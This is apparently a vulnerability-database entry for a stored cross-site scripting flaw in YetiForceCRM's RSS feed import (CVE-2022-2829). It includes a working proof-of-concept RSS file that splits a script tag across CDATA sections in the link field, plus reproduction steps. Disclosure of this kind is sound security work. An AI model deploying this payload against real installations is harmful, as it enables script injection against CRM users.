Lucene search
0xb4cD6EAA453-9758-41B7-8C38-FD878D6AEAB4HistoryAug 12, 2022 - 7:34 a.m.
Stored XSS vulnerability when importing RSS Feeds from external source
2022-08-1207:34:48
0xb4c
www.huntr.dev
4
0.001 Low
EPSS
Percentile
21.6%
Description
YetiForceCRM allows user create RSS Feeds without purifying the link field of the input data properly from external source. An attacker can take advantage of this vulnerability to perform an XML Injection attack that leads to stored cross-site scripting (XSS) on the target server.
Proof of Concept
Payload
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>RSS Test</title>
<link><![CDATA["]]><![CDATA[>]]><![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></link>
<description>RSS Test Description</description>
<lastBuildDate>Fri, 12 Aug 2022 00:00:00 -0000</lastBuildDate>
<item>
<title>RSS Test</title>
<link>http://example.com</link>
<description>a post</description>
<author>[email protected]</author>
<pubDate>Fri, 12 Aug 2022 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
Reproduction steps
Step 1:Create a filerss_xss.xmlwith the content of the payload above
Step 2:Add Feed Source via module Rss
Step 3:Click Save and the XSS should fire
Related
osv
osv
CVE-2022-2829
2022-08-23 04:15:00
cvelist
cvelist
cve
cve
CVE-2022-2829
2022-08-23 04:15:10
prion
prion
Cross site scripting
2022-08-23 04:15:00
nvd
nvd
CVE-2022-2829
2022-08-23 04:15:10